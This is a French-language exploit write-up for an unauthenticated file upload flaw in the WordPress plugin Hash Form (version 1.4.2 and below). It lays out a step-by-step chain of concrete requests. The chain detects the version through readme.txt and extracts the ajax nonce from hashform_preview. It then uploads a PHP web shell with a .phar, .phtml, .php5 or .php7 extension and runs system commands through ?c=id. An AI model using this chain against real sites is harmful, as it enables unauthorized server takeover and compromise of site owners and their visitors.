
Exploit pour CVE-2026-81780 : téléversement de fichier non authentifié dans le plugin WordPress Hash Form conduisant à une exécution de code à distance via des charges utiles PHP conçues.
CVE-2026-81780 — Hash Form RCE
La vulnérabilité
Téléversement de fichier non authentifié dans le plugin WordPress Hash Form (≤ 1.4.2). Le plugin permet le téléversement arbitraire de fichiers sans authentification appropriée ni validation du type de fichier, conduisant à une exécution de code à distance (RCE).
Chaîne d'exploitation
Étape Action 1 L'attaquant vérifie la présence du plugin Hash Form via readme.txt 2 Extrait ajax_nounce en prévisualisant les formulaires (hashform_preview) 3 Envoie une requête POST à hashform_file_upload_action avec une charge utile PHP 4 Téléverse un web shell en .phar, .phtml, .php5 ou .php7 5 Déclenche le shell en accédant à /wp-content/uploads/hashform/temp/v.{ext} 6 Exécute des commandes système via ?c=id
GET /wp-content/plugins/hash-form/readme.txt
↓
Version détectée (≤ 1.4.2)
↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
↓
Extraction du nonce : ajax_nounce=...
↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
↓
Téléversement : v.phar (ou .phtml, .php5, .php7)
↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
↓
Commande exécutée (uid=www-data)```